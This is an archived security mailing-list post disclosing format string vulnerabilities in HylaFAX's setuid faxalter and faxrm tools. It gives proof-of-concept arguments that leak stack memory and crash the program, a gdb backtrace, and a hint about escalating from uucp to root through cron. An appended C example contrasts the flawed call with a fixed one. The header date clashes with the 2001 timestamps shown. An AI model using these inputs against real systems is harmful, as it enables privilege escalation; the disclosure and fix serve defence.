From: KF (dotslashsnosoft.com)
Date: Mon Sep 04 2000 - 03:54:19 CDT

    Same deal on Mandrake 8.0...

    hylafax-client-4.1-5mdk.i586.rpm

    [rootlinux /root]# cat /etc/redhat-release
    Linux Mandrake release 8.0 (Traktopel) for i586

    [rootlinux /root]# ls -al /usr/bin/faxalter
    -rwxr-xr-x 1 root root 13380 Aug 6 2001 /usr/bin/faxalter*

    [rootlinux /root]# /usr/bin/faxalter -h %p,%p,%p,%p,%p,%p,%p -D 1
    0x804a153,0x401b3290,0x1,0x8048364,0xbffff25c,(nil),0x40015b94: Unknown host

    [rootlinux elguapo]# /usr/bin/faxalter -h %s,%s,%s -D 1
    Segmentation fault (core dumped)
    [rootlinux elguapo]# gdb /usr/bin/faxalter core

    (gdb) bt
    #0 0x40209ab7 in vfprintf () from /lib/libc.so.6
    #1 0x4020d0f0 in vfprintf () from /lib/libc.so.6
    #2 0x40207d7b in vfprintf () from /lib/libc.so.6
    #3 0x40066509 in FaxClient::vprintError () from /usr/lib/libfaxutil.so.4.0.1

    -KF

    >
    > There are some format string vulnerabilities in the latest hylafax package
    > try faxrm -h %x 1 or faxalter -h %x -D 1 for "proof of concept".
    > Both faxrm and faxalter are installed setuid uucp on FreeBSD (installed from
    > port collection). uid uucp is not that exciting but with some luck you'll
    > find uucp owned binaries running from cron with uid 0.
    >
    > --
    > Sent through GMX FreeMail - http://www.gmx.net
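
The "Unknown host" output and the vprintError/vfprintf frames above point to the `-h` argument reaching a printf-family call as part of the format string. The following added example (not HylaFAX source and not from the original post) puts that flawed pattern beside the constant-format fix; `report_error`, `unknown_host_flawed`, `unknown_host_fixed` and `count_conversions` are hypothetical names, and the exact shape of the flawed call is an assumption.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical error reporter: forwards a caller-supplied format to the
 * printf family, like the vprintError -> vfprintf frames in the backtrace. */
int report_error(char *out, size_t n, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    int r = vsnprintf(out, n, fmt, ap);
    va_end(ap);
    return r;
}

/* Flawed pattern (assumed): host text is spliced into the format string,
 * so conversions inside it are interpreted and read stray varargs. */
int unknown_host_flawed(char *out, size_t n, const char *host)
{
    char fmt[256];
    snprintf(fmt, sizeof fmt, "%s: Unknown host", host);
    return report_error(out, n, fmt);
}

/* Hardened form: constant format, host passed only as data. */
int unknown_host_fixed(char *out, size_t n, const char *host)
{
    return report_error(out, n, "%s: Unknown host", host);
}

/* Audit helper: count '%' conversions in untrusted text ("%%" is literal). */
int count_conversions(const char *s)
{
    int count = 0;
    for (size_t i = 0; s[i] != '\0'; i++) {
        if (s[i] != '%')
            continue;
        if (s[i + 1] == '%')
            i++;        /* escaped percent sign: skip both characters */
        else
            count++;    /* start of a conversion specification */
    }
    return count;
}

int main(void)
{
    char buf[128];
    const char *host = "%p,%p,%p";   /* constructed input */
    unknown_host_fixed(buf, sizeof buf, host);
    printf("%s (conversions: %d)\n", buf, count_conversions(host));
    return 0;
}
```

Building with `-Wformat -Wformat-security` flags direct printf-family calls whose format is not a literal; wrappers like `report_error` need `__attribute__((format(printf, 3, 4)))` for the compiler to check their callers too.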